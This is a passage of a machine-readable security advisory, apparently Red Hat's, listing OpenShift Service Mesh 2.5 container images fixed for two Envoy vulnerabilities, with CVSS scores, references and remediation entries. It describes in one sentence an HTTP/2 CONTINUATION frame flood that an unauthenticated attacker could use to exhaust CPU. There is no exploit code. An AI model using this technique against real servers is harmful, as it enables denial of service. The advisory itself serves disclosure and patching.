"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.4, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode", }, { acknowledgments: [ { names: [ "Bartek Nowotarski", ], organization: "nowotarski.info", }, ], cve: "CVE-2024-30255", cwe: { id: "CWE-390", name: "Detection of Error Condition Without Action", }, discovery_date: "2024-04-02T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2272986", }, ], notes: [ { category: "description", text: "A vulnerability was found in how Envoy Proxy implements the HTTP/2 codec. There are insufficient limitations placed on the amount of CONTINUATION frames that can be sent within a single stream. This issue could allow an unauthenticated remote attacker to send packets to vulnerable servers, which could use up compute resources to cause a Denial of Service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood", title: "Vulnerability summary", }, { category: "other", text: "Red Hat rates the security impact of this vulnerability as Moderate, in alignment with upstream Envoy. The worst case scenario is excessive CPU utilization causing a denial of service. Once an attack has ended, the system should return to normal operations on its own.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-30255", }, { category: "external", summary: "RHBZ#2272986", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2272986", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-30255", url: "https://www.cve.org/CVERecord?id=CVE-2024-30255", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-30255", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-30255", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm", }, { category: "external", summary: "https://nowotarski.info/http2-continuation-flood/", url: "https://nowotarski.info/http2-continuation-flood/", }, { category: "external", summary: "https://www.kb.cert.org/vuls/id/421644", url: "https://www.kb.cert.org/vuls/id/421644", }, ], release_date: "2024-04-03T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", 